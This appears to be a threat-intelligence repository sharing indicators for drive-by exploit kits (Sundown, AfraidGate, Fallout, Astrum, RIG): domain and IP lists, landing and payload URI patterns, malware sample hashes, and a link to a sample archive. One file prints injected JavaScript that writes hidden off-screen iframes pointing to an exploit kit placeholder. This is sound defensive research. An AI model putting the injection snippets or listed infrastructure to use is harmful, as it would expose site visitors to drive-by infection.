├── IOCs
    ├── Readme.md
    ├── misp.event.2443.5a79b8fc-4460-4a3a-a6e6-2232c0a8a8de.xml
    ├── Gootkit_2018-03-21_misp.event.2619.5ab28984-869c-434a-9a54-0d0fc0a8a8de.json
    ├── misp.event.2834.5b22c1bd-1ab8-4506-b4a6-1746c0a8a8de.json
    └── misp.event.2879.5b3544f7-1e20-4f39-8713-055ec0a8a8de.json
├── README.md
├── Sundown-N
├── ScriptJS.md
├── Fallout_EK_Pattern.md
├── Astrum_drop_2016-12-07.md
├── RIG_Pattern.md
└── Nebula_URI


/IOCs/Readme.md:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Public share of DriveBy related Data
2 | 


--------------------------------------------------------------------------------
/Sundown-N:
--------------------------------------------------------------------------------
 1 | actressheight.knowledgedrugsaturday.club
 2 | advantagelamp.numberdeficitc-clamp.site
 3 | advertiselaura.bubblecomparisonwar.top
 4 | afforddrill.xzv4rzuctndfo.club
 5 | agendawedge.shoemakerzippersuccess.stream
 6 | agesword.alvdxq1l6n0o.stream
 7 | api.beps.io
 8 | apologycattle.gramsunshinesupply.club
 9 | apologycold.shearssuccessberry.club
10 | applywholesaler.tboapfmsyu.stream
11 | approvepeak.knowledgedrugsaturday.club
12 | approveriver.jsffu2zkt5va.trade
13 | authorisationmessage.casdfble.stream
14 | authorizationmale.foundationspadeinventory.club
15 | authorparticle.390a20778a68d056c40908025df2fc4e.site
16 | bakermagician.alvdxq1l6n0o.stream
17 | birthdayexperience.foundationspadeinventory.club
18 | bombclick.alvdxq1l6n0o.stream
19 | borrowfield.77e1084e.pro
20 | boydescription.356020817786fb76e9361441800132c9.win
21 | budgetdegree.maskobjectivebiplane.trade
22 | buglecommand.textfatherfont.info
23 | burglarsatin.jsffu2zkt5va.trade
24 | buysummer.77e1084e.pro
25 | captaincertification.77e1084e.pro
26 | certificationplanet.87692f31beea22522f1488df044e1dad.top
27 | chargerule.textfatherfont.info
28 | chooseravioli.87692f31beea22522f1488df044e1dad.top
29 | cityacoustic.textfatherfont.info
30 | clausmessage.nationweekretailer.club
31 | clickbarber.356020817786fb76e9361441800132c9.win
32 | coachadvantage.reportattackconifer.site
33 | competitionseason.numberdeficitc-clamp.site
34 | confirmationaustralian.retaileraugustplier.club
35 | cowchange.distributionstatementdiploma.site
36 | customergazelle.cyclonesoybeanpossibility.bid
37 | dancerretailer.shearssuccessberry.club
38 | databasesilver.reportattackconifer.site
39 | date-of-birthtrout.87692f31beea22522f1488df044e1dad.top
40 | decembercommission.divingfuelsalary.trade
41 | deficitshoulder.lossicedeficit.pw
42 | departmentant.distributionstatementdiploma.site
43 | dependentswhorl.jsffu2zkt5va.trade
44 | derpenquiry.87692f31beea22522f1488df044e1dad.top
45 | disadvantageproduction.brassreductionquill.site
46 | disadvantageproduction.casdfble.stream
47 | distributionfile.edgetaxprice.site
48 | distributionjaw.hockeyopiniondust.club
49 | domainconsider.mxkznekruoays.trade
50 | employergoods.deliverycutadvantage.info
51 | equipmentparticle.shockadvantagewilderness.club
52 | equipmentwitness.maskobjectivebiplane.trade
53 | europin.pedestrianpathexplanation.info
54 | explanationlier.asiadeliveryarmenian.pro
55 | fallhippopotamus.deliverycutadvantage.info
56 | goallicense.shearssuccessberry.club
57 | goalpanda.retaileraugustplier.club
58 | goodswinter.retailersproutalto.pro
59 | holidayagenda.retaileraugustplier.club
60 | hygienicreduction.brassreductionquill.site
61 | hygienicreduction.casdfble.stream
62 | instructionscomposition.pheasantmillisecondenvironment.stream
63 | instructionssaudiarabia.retailersproutalto.pro
64 | invoiceburst.cyclonesoybeanpossibility.bid
65 | invoicegosling.edgetaxprice.site
66 | jailreduction.edgetaxprice.site
67 | jobhate.pedestrianpathexplanation.info
68 | limitsphere.pheasantmillisecondenvironment.stream
69 | lipprice.edgetaxprice.site
70 | marginswiss.divingfuelsalary.trade
71 | marketsunday.deliverycutadvantage.info
72 | outputfruit.divingfuelsalary.trade
73 | paymentceramic.pheasantmillisecondenvironment.stream
74 | penaltydrug.exhaustamusementsuggestion.pw
75 | penaltyinternet.asiadeliveryarmenian.pro
76 | phonefall.asiadeliveryarmenian.pro
77 | printeroutput.pheasantmillisecondenvironment.stream
78 | purposeguarantee.shearssuccessberry.club
79 | rainstormpromotion.gramsunshinesupply.club
80 | redrepairs.distributionstatementdiploma.site
81 | reindeerprofit.divingfuelsalary.trade
82 | reminderdonna.divingfuelsalary.trade
83 | rollinterest.asiadeliveryarmenian.pro
84 | salaryfang.shockadvantagewilderness.club
85 | soldierprice.distributionstatementdiploma.site
86 | startguarantee.gramsunshinesupply.club
87 | stationdeadline.improvementdeadlinemillisecond.club
88 | suggestionburn.distributionstatementdiploma.site
89 | supplyheaven.gramsunshinesupply.club
90 | swissfacilities.gumimprovementitalian.stream
91 | transportbomb.gramsunshinesupply.club
92 | transportdrill.facilitiesturkishdipstick.info
93 | 


--------------------------------------------------------------------------------
/ScriptJS.md:
--------------------------------------------------------------------------------
 1 | #ScriptJS/AfraidGate
 2 | 
 3 | ## __Publications:__
 4 | | Title |  Date Here | Source |Comment|
 5 | |---|---|---|---|
 6 | |[Dridex Actors Get In the Ransomware Game With "Locky"](https://www.proofpoint.com/us/threat-insight/post/Dridex-Actors-Get-In-the-Ransomware-Game-With-Locky)| 2016-02-16 |Proofpoint||
 7 | |[Locky Ransomware Installed Through Nuclear EK](http://researchcenter.paloaltonetworks.com/2016/03/locky-ransomware-installed-through-nuclear-ek/)| 2016-03-21 |PaloAlto||
 8 | |[Threat Spotlight: Exploit Kit Goes International Hits 150+ Countries](http://blog.talosintel.com/2016/04/nuclear-exposed.html)| 2016-04-20 |Talos||
 9 | |[Highly Popular Anime Site Jkanime Compromised](https://blogs.forcepoint.com/security-labs/highly-popular-anime-site-jkanime-compromised-redirecting-users-neutrino-ek)| 2016-06-21 |Forcepoint||
10 | |[Neutrino EK’s Afraidgate pushed in malvertising attack](https://blog.malwarebytes.com/cybercrime/exploits/2016/09/neutrino-eks-afraidgate-pushed-in-malvertising-attack/)| 2016-09-13 |Malwarebytes|*Payload is Godzilla here. Locky is in fact a 2ndStage*|
11 | |[Fox stealer: another Pony Fork](http://malware.dontneedcoffee.com/2016/09/fox-stealer-another-pony-fork.html)| 2016-09-26 |MalwareDontNeedCoffee||
12 | ----
13 | 
14 | | Date |Domain| IP |
15 | | :------- | :---- | :---|
16 | |170206|tandem.florenciaespineira.cl|192.241.246.34|
17 | |170204|torneonis.cattcval.com.ve|138.197.222.151|
18 | |170203|longtrim.datatestserver.com|159.203.30.60|
19 | |170201|kithole.seanconnor.com|159.203.30.60|
20 | |170122|cuprum.poemar.es|146.185.151.179|
21 | |170122|bombarda.mkoussa.com|146.185.151.179|
22 | |170121|pistole.1stclassmunitions.com|146.185.151.179|
23 | |170118|team.motivaplan.com.br|45.55.10.142|
24 | |170110|malina.cfdiweb.mx|178.62.242.179|
25 | |161214|alfio.brasilperfectcity.com|188.166.17.115|
26 | |161209|stylesheet.bittitle.com|138.68.144.43|
27 | |161203|aquarius.away.es|138.68.144.43|
28 | |161127|mikkie.thejwfnet.co.uk|188.166.4.51|
29 | |161124|max.nasasi.com.ar|159.203.18.229|
30 | |161120|parameter.miafp.cl|159.203.18.229|
31 | |161023|club.panduan-ngeblog.com|138.68.135.94|
32 | |161015|round.luc-hariman.com|159.203.2.200|
33 | |161015|alexa.lorea.io|159.203.2.200|
34 | |161011|monte.aguero.com.au|82.196.10.194|
35 | |161003|sp.gridjunky.com|95.85.46.182|
36 | |160930|spower.gogohen.com|95.85.46.182|
37 | |160928|aug.nightrelay.co.za|139.59.171.176|
38 | |160927|monro.nillaraujo.com|139.59.171.176|
39 | |160926|lesley.portcoquitlamweather.ca|188.166.66.191|
40 | |160923|mouse.redvos.com|188.166.66.191|
41 | |160922|rouse.haslhome.com|46.101.93.53|
42 | |160920|test.linonsa.com|146.185.158.150|
43 | |160919|van.readytogo.club|178.62.23.109|
44 | |160918|van.readytogo.club|178.62.23.109|
45 | |160918|knight.manex.us|178.62.23.109|
46 | |160915|vk.manex.us|178.62.23.109|
47 | |160908|note.followthebrowns.com|159.203.3.186|
48 | |160906|ono.bienestando.cl|159.203.3.186|
49 | |160901|murphy.tahubaxoku.com|146.185.172.147|
50 | |160828|ops.latokaski.fi|138.68.18.73|
51 | |160828|nonna.culturizartechillan.cl|138.68.18.73|
52 | |160818|font.enriquemonsalve.cl|178.62.77.103|
53 | |160814|way.minadepreco.com.br|188.166.54.203|
54 | |160814|make.kankerblogger.com|188.166.54.203|
55 | |160811|global.platinoviajes.com.ve|188.166.54.203|
56 | |160801|one.hiiragihoo.com|139.59.160.138|
57 | |160730|temp.blog-sandltnst.co|139.59.160.138|
58 | |160726|leon.stmaryschooldmt.com|46.101.26.161|
59 | |160722|long.revistashine.com.ar|46.101.26.161|
60 | |160713|stown.katieprallphotography.com|188.166.38.125|
61 | |160629|dance.jmestudiocontable.com.ar|139.59.191.79|
62 | |160626|onno.motorgear.com.au|188.166.38.125|
63 | |160626|dron.transportemorelli.com.ar|146.185.173.25|
64 | 
65 | ----
66 | Script example :
67 | 
68 | ```javascript
69 | document.write('<div class="" style="position:absolute; width:399px; height:400px; left:15px; top:-740px;">  <a> </a><div> <a class="menu_link_new"></a> strong<iframe src="[EK HERE]" width=255 height=261 ></ifram'+ 'e><a></a></div><a class=""></a></div>');
70 | ```
71 | ```javascript
72 | document.write('<div style="position:absolute; width:365px; height:400px; left:10px; top:-475px;">  <a class=""></a><div class="menu-add-name"> <a class="menuaddname"></a> <iframe src="[EK HERE]" width=271 height=278 ></ifram'+'e><a class=""></a></div> </div>');
73 | ```
74 | ```javascript
75 | document.write('<div style="position:absolute; width:355px; height:363px; left:10px; top:-954px;">  <a class=""></a><div class="menu-add-name"> <a class="menuaddname"></a> <iframe src="[EK HERE]" width=285 height=290 ></ifram'+'e><a class=""></a></div> </div>');
76 | ```
77 | 
78 | 


--------------------------------------------------------------------------------
/Fallout_EK_Pattern.md:
--------------------------------------------------------------------------------
 1 | For Fallout see: https://www.nao-sec.org/2018/09/hello-fallout-exploit-kit.html
 2 | 
 3 | 2018-08-30&31
 4 | 
 5 | Landing:
 6 | /4aHf983/1953-02-05/08_09_1948/1991_04_12.jspx?5oBOE=Famose
 7 | /9999/28_11_2019/11875?PEwX=TqLqSMK&IgUIqTeCIFs=EdTMxUm&FAwwIW=Sarcosoma-Pharyngic-plonko&Reprofess=bulbuls
 8 | /0oH99W/dragomen_6614_Resharing/hj82tPSWH?O2387u9=N1U17Pd
 9 | /5E2v/1998-10-03/Khkf0a9/T21fse.cfm
10 | /gordolobo-2117-11294-10135/Neophytes/9903.cfm
11 | /LOvSjqNK/burweed-macroptic-doater-11218/1551-pedimana-rollerman-Causeries.aspx
12 | /Freckened/j3l7.htm?Ugcwcq=Avasg&rcYSQj=GnizO&U6PcF7H=8018&Parochian=Prestamp_Gulfside&Dkkgeex=04_04_1962
13 | /15_08_1988/endplates-Grownup-Autarkies?YWPZopXhe=WcO5nEE&pICCG=Funniment
14 | /ZtPoO/muskiest_shaveable_malaperts/1949_08_04.phtml?repoll=hypnos&YE57eO6=Areole&bGdbUmMN=5847&xX90kPG=1980_08_16
15 | /lMSyGhD/Rejecters-5806/1974_03_05.jsp?L7eyJIb=WyfbEM&9p1iJf=palefaces_buffets_Praxithea_misgauges_Downsman&esteemed=YI4r&9R1CrX2=11473_cynipoid_decoding_9060&GpD4WDo=Unboxing&cBD7=8665
16 | /shoffroth-leeward-pelanos/LIiSgjI/1959-10-07.jsp?CH0IeSr=2012-12-26&oseoeec=Chisled-Bombloads-5529-2749
17 | /8723/7522/2017_08_26.cfml
18 | /8403/HlpQ/bIaMLT/27_01_1947
19 | 
20 | Payload:
21 | /11965-Cravat-Carbamic-4628-3276/junctural/15_04_1975/Manlike_fricando_Casemate_afterguns.cfml?yataghan=Handgrips-Columbate-Creply&50xYiZ=ExwftFFu&VwdZS=banditry-Elytrin-coxswain&Evasion=1163
22 | /Fidfad-Delusive-Rotacism-3350/ziZGZM/nontruth-Misbills-prehumans/2020-05-28?Topsiders=09-04-1968
23 | /2018-05-27/bulder?WRiLTuKg9=IFqS
24 | /14639/agoroth_Pinkies_frizzer_tanaist_geraniols/Poloidal/6134
25 | /multitask-dauphine-cordages-Undevil/1966_01_22
26 | /Imprimis/Gedanite-arborical/tetraodon.cfm
27 | /5095/2155/12714.html
28 | /OvFOAe/3096-Murderess-Pozzolana/njuYocrh.phtml?Wrxz0kQK=7884_1101_7968
29 | /1956_03_11/2004_05_28?SzXirZ=hodads&9n0b2nd1=15878&CHw8xs6=agsquNNn&z955cl=GLcSO
30 | /0JWYS/attached-11841-Prisoners/glossina/9999.cfm
31 | /17-06-1950/8797/flintlock-10524-7713?yTPwTN=fRGtBH&midwise=stromboid-4871-11553-kaisers&AkTgJ6=3629
32 | /Overdyed_teariness_10501_Censing/8917/14542.cfml?tristich=10_01_1964
33 | /whippy_Delace_Woodpeck_Archaeol/efxwibl/Pietisms-Eavesdrop-endoss.php
34 | /6857/Kincob-8292-11464/5zD9/4107.xhtml?9ZJ1z=27_07_1958&agonothet=ucqwB&2Sekukyp=6405&ripplet=2001-06-27&Diasystem=Corindon
35 | /Stamindia/damasked-Inaugurer-Rekindle-Ballastic.cfm?IsPc6T=8266-Weasons-7816-7930&9Yopct=Seconded_5957_7118_12675&Filmmake=11930
36 | /adherent-malaxator-bidets/5394.dhtml?Nigricant=8306-trashery-6340&impletive=Fivesome-Pretaster-sketchier-Brunellia-Kialkee-10805&DfYkLgMS=3427&UxhUdl=Remail_bothered_akkadian_Fannia_Scottish&Nlp4Go=Pettiness_audivise_Hymenia_Furlane
37 | /lAwYK/poetwise/mya4sP/piacula/1961_01_15?QjsJ=Manlikely-stogeys&JOV44b=Milleress_teleodont_Upbinds&GqmQEwZnd=halobates
38 | /PoFKVX/Unibasal-Ulemas/Colauxe_Tempyo.shtml?FZRx=Sudoral&ApGopDy=GsGjn&MFVbzCl=Marechal-corometer-Sargonic-galloon&installed=2767
39 | /9375/rNGlD/hayshock?gqFuVOB=4038&gGtp6=Tirade&m3MQi5A9=10976&sVS2A=Trostera
40 | /Unusable-broccolis/1098_madarosis_Gadbush_15866/18_07_1990/ldkzcJZ.aspx?5ERjGlKJm=NvcKzgv&VM17075f=11325&TnpCRbJ=manation&pHoIIpa6c=Timaua&7Mt9d8=Cinnamene-Betatrons-2270-rebaited
41 | /unisons/jPFHf/4248.phtml?jpoM=associe-fabianist-terrie&kUQg=6108&uOT4a=Athort-Jacknives-Jaspilyte
42 | /kDCDQ/Allocable-Chawbuck-Chaluka-Chores-triplet?fleetness=896_4270_Runlet_8698_adinida&MOupir=bloater-orbite
43 | /tricolour_Skeough_fatihah/carbolic_Reveries_pyorrheal_Overruns_unconcern/10519/cptoaNraJM.phtml
44 | /uGKdECiB/08_02_1983.shtml
45 | /zwanziger/1985_10_06/MaHIK/3609?ZPJdtf=Glints&cYAO=yqmboz&TSha=abstricts-svante&xtxZyjRA=IN8M
46 | /7056/HmzaQ/Elodea/8uj1tm.jsp
47 | /Elisions-Riboza-Rigwiddy-Heapstead/8275tv9/PMJqV/Begirdle.cfml?2TV5pG=hOqeWMno&OIfd64x=Shallops_Summative_1050_Parvenu
48 | /6528/DJUUMGVJ?braata=XYBMX&Coenamors=Newshound
49 | /6273-3345/HEaa/pryler-Finched-bytime-Corvee/chainsmen
50 | /HpPZAPl/Indigogen
51 | /Eggnog/schiffli?AfHoE=24_03_2001&gOu5Mm4=4538&GNPDjR=3069&8wXBo12=Betrothal
52 | /7194/10-06-2000/8592-Streetlet-Dhaura-shadberry-secede
53 | /Voyeurs/gQPogsHO/Holystone-medianic/eucone-9272-7127-4597-8303/uru1z2c.cfm
54 | /quelling/2985.phtml?OQhWRh=1974-01-10&Triflers=26-04-1991&03lpO=piccage
55 | /5400/17-03-1940.dhtml?Windchill=18534&MjUcC=06_06_1950&sAnu=54ypqLY&GySAmBXvz=micron-lenape-lionel-bezzle
56 | /2930/eku0/1981_06_01?wWJIiY73=8910-5568-6343-10117-2268-8809&Perfix=Inbrought_Normocyte_Combatted&xSPQu=64kh7&Sideronym=14_05_1973
57 | /jbVa0CA/Apagogue_bluffs/busings_Katinka/tarentine-underlet-fritted-foisty-Boosters-Keftiu
58 | /3493/28-09-1945/7671/topatopa_Postboys/26_01_1975
59 | /Phacelia-jumboism-Sequest-Museums/thoriums/QOiHQsf/75416.htm
60 | /16-05-1944/WKWD/8845/2014_12_26?ECHN4zsA8=4667-6638&hoking=3121&5AOn=qjAwQuc&stockado=08_05_1982
61 | /Uvulitis_allying_vanload/retardee_oriently_unwalled?Rooftrees=JCTJzkBs&pKMvjw=Ja414qp8&xMlleWX=Folderol_Tombstone_Reforbid&EPHE=qnj5wq
62 | /9389_convents/ropeway/1973-05-13.shtml
63 | /AG0u5B/08-08-1948/Tailed/1959-08-27
64 | /22-02-1975/uGCEYg.shtml?8gXjuIgrQ=KDkzupg&Vitesses=Keratins_Spinodal_Technism_barehead_rakshasa&F1Enyb=machismos
65 | /Phallism-abduces-2687-Coffined/yScYGk0.html
66 | /HjuNrCAt/SXMlft/7ij51BDz9?saprine=Sleech_11241&Z7026k9A3=1956_08_14&BcyHFJs2j=9078
67 | /Pedicabs-Overtoil-everyone-niobid-Biovulate/ehtxpBusQUo/OpkNpr
68 | /1967_08_02/12040-11612-3453-Refuter/Unsanded-christly-Navigates-sparsile/Freakouts/996-12593-Bollixed-Thicksets.cfm?XkalV=9384&dignosle=raZT7&Forestial=Blandish
69 | /5625/Arbovirus-fowlers/1979_11_01/Gustful-jukebox-6670?57aa08E=KsmTHPq&g4K5D9vsM=antapocha&urodelous=cafardise&9fA5=Czechish&WJZKgeI=9938
70 | /lmaoJ6/18_02_1963/Epilogued_Pronomial_campaign/22-06-1985.htm
71 | /6462/Besoothes_mercaptal/snobbery-7475
72 | /chrysopa_didact_gigantism_paulism/2020_10_06/underbids-suspended
73 | /7601/Annats-7591-12580/pnRLvrk.htm
74 | /12539/TO3944/Solotink.cfm?cWTHFtWC=Kinoos_Halvah&fXGymfF=NuUcPJMVv&a4U1ej=22_03_1946
75 | /Faller/1995-08-06.cfm?qFDzEcQMy=Happened-simous&jMDfjT=Treats&TLDgCuaiD=cFjEDx&beduck=01-09-1962
76 | 


--------------------------------------------------------------------------------
/Astrum_drop_2016-12-07.md:
--------------------------------------------------------------------------------
  1 | ###Some Astrum drops###
  2 | 
  3 | >I have been asked for samples tied to Astrum EK (referered as Stegano EK by Eset in this [nice writeup](http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/)) mentionned in that screenshot of MISP:
  4 | [![AdGholas - Campaign - MISP](https://pbs.twimg.com/media/Cy_rgPxW8AAgFdi.jpg)](https://twitter.com/kafeine/status/806122813966913536)
  5 | https://twitter.com/kafeine/status/806122813966913536
  6 | 
  7 | So I sent them to : [VT](https://www.virustotal.com/file/dc3840d3c0b7e04734d4a3440fe9e5291a84e02e8a5031217315b6344e3aac66/analysis/1481139747/)
  8 | 
  9 | *I stored the zip [here](https://files.dontneedcoffee.com/index.php/s/sGVO9Wkqt2mHvUR) but please prefer VT link if you have access*
 10 | 
 11 | ###zip content###
 12 | *  Name: 175760baa2bbca3fbdc4d8f30c993b89_aningik.kaf
 13 |   *  File Size: 40448 Byte(s) (39.50 KB)
 14 |   *  Version:  12.0.6606.1000
 15 |   *  MD5:  175760baa2bbca3fbdc4d8f30c993b89
 16 |   *  SHA1:  ae35c375086970b7a20242eaa377e36f20b2e766
 17 |   *  SHA256:  cb9fbb444a6a0b8fd1984db02f9523f9914df2b0747fecc7a1076beee364eb99
 18 | 
 19 | *  Name: 6229795fa30ee413d1aaeb1619a89b8f_dreambot.kaf
 20 |   *  File Size: 1869312 Byte(s) (1.78 MB)
 21 |   *  Version:  7.8.0.0
 22 |   *  MD5:  6229795fa30ee413d1aaeb1619a89b8f
 23 |   *  SHA1:  2197c2632fb0f59ffffba2f26bcd6f12412793bc
 24 |   *  SHA256:  70406966f853345efe978ecf6e5f15233aab11296cd71d7adfaee664f33ab6a1
 25 | 
 26 | *  Name: 9072591fd08526efe69572294a5a0c63_vawtrak_113.kaf
 27 |   *  File Size: 134144 Byte(s) (131.00 KB)
 28 |   *  MD5:  9072591fd08526efe69572294a5a0c63
 29 |   *  SHA1:  bab7a711f30e97caae04add267ddec743eea33cb
 30 |   *  SHA256:  d8c1ea29e6d5bc1ffbd735749237a7e03cd900fb94c94e2f6f18881479b67922
 31 | 
 32 | *  Name: a2fc4c3fbd4efd2c24d26b8ede001a10_dreambot.kaf
 33 |   *  File Size: 491594 Byte(s) (480.07 KB)
 34 |   *  Version:  2.0.1.0
 35 |   *  MD5:  a2fc4c3fbd4efd2c24d26b8ede001a10
 36 |   *  SHA1:  ea839998a9eb52c7c420bf9ca69c90807784ebfd
 37 |   *  SHA256:  b88cc172abb47f4a62706a474527bc14a768e8f72f63ae5383320e849b4d3e50
 38 | 
 39 | *  Name: a0144df5caa43684f733634d7937fe25_gootkit.kaf
 40 |   *  File Size: 160768 Byte(s) (157.00 KB)
 41 |   *  MD5:  a0144df5caa43684f733634d7937fe25
 42 |   *  SHA1:  231dc8c84a65804a69be351e52892bb7bf1532d9
 43 |   *  SHA256:  c58c97d8ff93eca30e69335cc7c6428fe00c0876e87cf643d025821d27dbd44f
 44 | 
 45 | *  Name: b2eead90d9cc54752b027e9a9f32741c_dreambot.kaf
 46 |   *  File Size: 166392 Byte(s) (162.49 KB)
 47 |   *  MD5:  b2eead90d9cc54752b027e9a9f32741c
 48 |   *  SHA1:  bf8b2208d242bab61bde878053b2be7a116904eb
 49 |   *  SHA256:  672f56545491108a5e710b727ee6268d7d9ff83612a573c716b02618e26a370f
 50 | 
 51 | *  Name: e96f2bfb9527e08fc5f82500ef96e487_vawtrak_114.kaf
 52 |   *  File Size: 172032 Byte(s) (168.00 KB)
 53 |   *  Version:  1.0.2.0
 54 |   *  MD5:  e96f2bfb9527e08fc5f82500ef96e487
 55 |   *  SHA1:  281373b455c9d400e1e56e25e7dcd7cd174a7d65
 56 |   *  SHA256:  70a4b312ceec1eb2c259913451c93c138465f3d70c74d0a61eb4c48c5aba0b51
 57 | 
 58 | *  Name: ecd1ad7ea3950f29a9afbc000d2b9b1a_dreambot.kaf
 59 |   *  File Size: 699392 Byte(s) (683.00 KB)
 60 |   *  Version:  3.1.8606.0
 61 |   *  MD5:  ecd1ad7ea3950f29a9afbc000d2b9b1a
 62 |   *  SHA1:  e9f0c59a2090e681e5d4b5166e6d60f9fb9db772
 63 |   *  SHA256:  61b8655dfdb553d8fbd5afab7997e247da4b1e9dfc1bbb2474750617bcca5e0f
 64 | 
 65 | *  Name: f12cdb36588d661a0cd1c63808df3f20_ramnit.kaf
 66 |   *  File Size: 275493 Byte(s) (269.04 KB)
 67 |   *  Version:  14.0.1.2
 68 |   *  MD5:  f12cdb36588d661a0cd1c63808df3f20
 69 |   *  SHA1:  50dc8a7e5df13f94dadbe48d81d136b82b19b131
 70 |   *  SHA256:  57adba8dea8bd0eb8dab7a2e77a52823b60b6062df64c77af0f5bfd7eafb542c
 71 | 
 72 | *  Name: f9243ae7005815ff3e3fbe43505e22b3_godzilla.kaf
 73 |   *  File Size: 233472 Byte(s) (228.00 KB)
 74 |   *  Version:  7.6.0.0
 75 |   *  MD5:  f9243ae7005815ff3e3fbe43505e22b3
 76 |   *  SHA1:  bcfde94dcb4be8be69ca706c703de170956ffe0b
 77 |   *  SHA256:  be1652dbe9bb2fe035e29c8d341f7b54137e47f4d3d5b8a6f70ca7525a27f4c7
 78 | 
 79 | *  Name: fa495110b05f2bb572e46214a681e3f3_zloader.kaf
 80 |   *  File Size: 127488 Byte(s) (124.50 KB)
 81 |   *  Version:  10.6.6377.5032
 82 |   *  MD5:  fa495110b05f2bb572e46214a681e3f3
 83 |   *  SHA1:  e2da4e94a5ace245c0c0acde2660d342f6c00454
 84 |   *  SHA256:  f5abbc55f71a4df294a9dde70e41617e32a64e4ccf6a0c6baf7f4306ef0070b2
 85 | 
 86 | *  Name: 0b9e17cec5939bf3ea26bece55949b44_dreambot.kaf
 87 |   *  File Size: 422912 Byte(s) (413.00 KB)
 88 |   *  MD5:  0b9e17cec5939bf3ea26bece55949b44
 89 |   *  SHA1:  e471707419f31a876484df03f2fe84cdac230a8e
 90 |   *  SHA256:  f029a658e6b63e48d791310ffda403f0eb36f8a5108b14a87b85b5be01e18b86
 91 | 
 92 | *  Name: 0f048d74e11515a4eeee5a28e5eb93d3_dreambot.kaf
 93 |   *  File Size: 626688 Byte(s) (612.00 KB)
 94 |   *  Version:  1.8.0.39801
 95 |   *  MD5:  0f048d74e11515a4eeee5a28e5eb93d3
 96 |   *  SHA1:  b2e4e5c38be5380558d2ada30c3e30b015cf5b16
 97 |   *  SHA256:  8d58eb6316855492b689242d852908a9e9005bb950910fa7f3e1be6d8fe70895
 98 | 
 99 | *  Name: 1a03106ce5f67f2928d31dfea0f99d63_zloader.kaf
100 |   *  File Size: 3747328 Byte(s) (3.57 MB)
101 |   *  MD5:  1a03106ce5f67f2928d31dfea0f99d63
102 |   *  SHA1:  5eba3d5c01e404c965e4d51e34e7904b3686c488
103 |   *  SHA256:  da781eb4c3d0bcfa77fa06ec0c0f1d40f1152580744e4d8cdfbf99de82c3f32e
104 | 
105 | *  Name: 7a85085f54f4e10a10a3270ccce67cc3_dreambot.kaf
106 |   *  File Size: 155136 Byte(s) (151.50 KB)
107 |   *  MD5:  7a85085f54f4e10a10a3270ccce67cc3
108 |   *  SHA1:  6f155e576bbe80703cf48246c2bea1e35e06acf5
109 |   *  SHA256:  d5a492253d0a336a620b8447780ec8efee720f1b9575fb77d2d29b01fbf18ca9
110 | 
111 | *  Name: 97b764282ad33dc7fc19f5dbd7a3649a_gootkit.kaf
112 |   *  File Size: 335872 Byte(s) (328.00 KB)
113 |   *  Version:  15.4.0.0
114 |   *  MD5:  97b764282ad33dc7fc19f5dbd7a3649a
115 |   *  SHA1:  bfbfa097560e84760201c90d8e4da6a7896c0067
116 |   *  SHA256:  1d8acc610c84233ecd91a373efa450e0719078c50d17eb927b465d4675d02e7f
117 | 
118 | *  Name: 3129c8b9ccf91f3349262c12be21d5ed_godzilla.kaf
119 |   *  File Size: 45568 Byte(s) (44.50 KB)
120 |   *  Version:  8.9.0.0
121 |   *  MD5:  3129c8b9ccf91f3349262c12be21d5ed
122 |   *  SHA1:  d7688d0af073ad89051ca87d8ba31b18ea4f55e9
123 |   *  SHA256:  9ae69049018ddb938b454e55ffe75daa2e8a446d226ab3193ea0011870a5e445
124 | 
125 | 


--------------------------------------------------------------------------------
/RIG_Pattern.md:
--------------------------------------------------------------------------------
 1 | # RIG Pattern
 2 | 
 3 | 2017-06-12
 4 | ```
 5 | 2017/06/12 13:00:25;46.229.220.31;80;46.229.220.31;199860;Stack Data Network LLC;/?Style&sessid=CeliA86EuKLBSOge03BeAKgxplY5fWlkX8P-miULSyx6Y0cKE-CW9UU4HupE&param=z3_QMvXcJwDQDoTJMvrESLtEMU_OFUKK2OH_783VCZz9JHT1vvHPRAP0tgW&Tech=3820
 6 | 2017/06/12 13:05:16;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Video&param=z3bQMvXcJwDQDoTFMvrESLtEMU_OH0KK2OH_783VCZr9JHT1vvHPRAP7tgW&sessid=CeluD9aAqL-BZPQK3hEPRcwNon4YOU1sT8firhkXQz0XKiMKE-CW9UU4HupE&Sport=3033
 7 | 2017/06/12 13:05:16;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Sport&param=wHvQMvXcJwDMFYbGMvrESKNbNknQA0KPxpH2_drRdZqxKGni2eb5UUSk6FiCEh3&sessid=h8KIvK-BTPwHmiEHVKldhzYpVW1oR_6qqikaDzhWbhZWK-UTYZwJ1z6LRVvQ42w&Sport=2056
 8 | 2017/06/12 13:10:17;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Travel&sessid=m3U8PMqe-RTOgLpi0TVKVNinIZVV1MR8vz_jUTTm0LNiMPQ_RbcUTp1u9CTUbI&param=wXfQMvXcJwDQDIbGMvrESLtBNknQA0KK2I32_dqyEoH9eWnihNzUSkr06B2aC&Video=2533
 9 | 2017/06/12 13:10:18;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Money&sessid=Cel-DoPMpKONSPQDhjBSFLwRgntxZVVwT_6-mh0PUmhXP1sWA-yW9UU4HupE&param=z3zQMvXcJwDQDoTEMvrESLtEMU_OG0KK2OH_783VCZv9JHT1vvHPRAP6tgW&Regions=5223
10 | 2017/06/12 13:15:19;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Tech&sessid=m2FpPR-JLMGPAC0jxSGL1Rgn9tcBFwb9qGp3ULTnRGYhcTQ9R3ZUTp1u9CcUbI&param=wXzQMvXcJwDQDobGMvrESLtFNknQA0KK2I_2_dqyEoH9fWnihNzUSkrx6B2aC&Sport=2601
11 | 2017/06/12 13:15:20;83.166.241.159;80;83.166.241.159;24936;LLC Management Company Svyaz;/?Regions&param=z3zQMvXcJwDQDoTGMvrESLtEMU_OGkKK2OH_783VCZ39JHT1vvHPRAPwtgW&sessid=CelzYpPIoKrsFPle1iBfWeAxinogLUl9H9Kir3xDRmBXKgZ6D-iW9UU4HupE&Health=5153
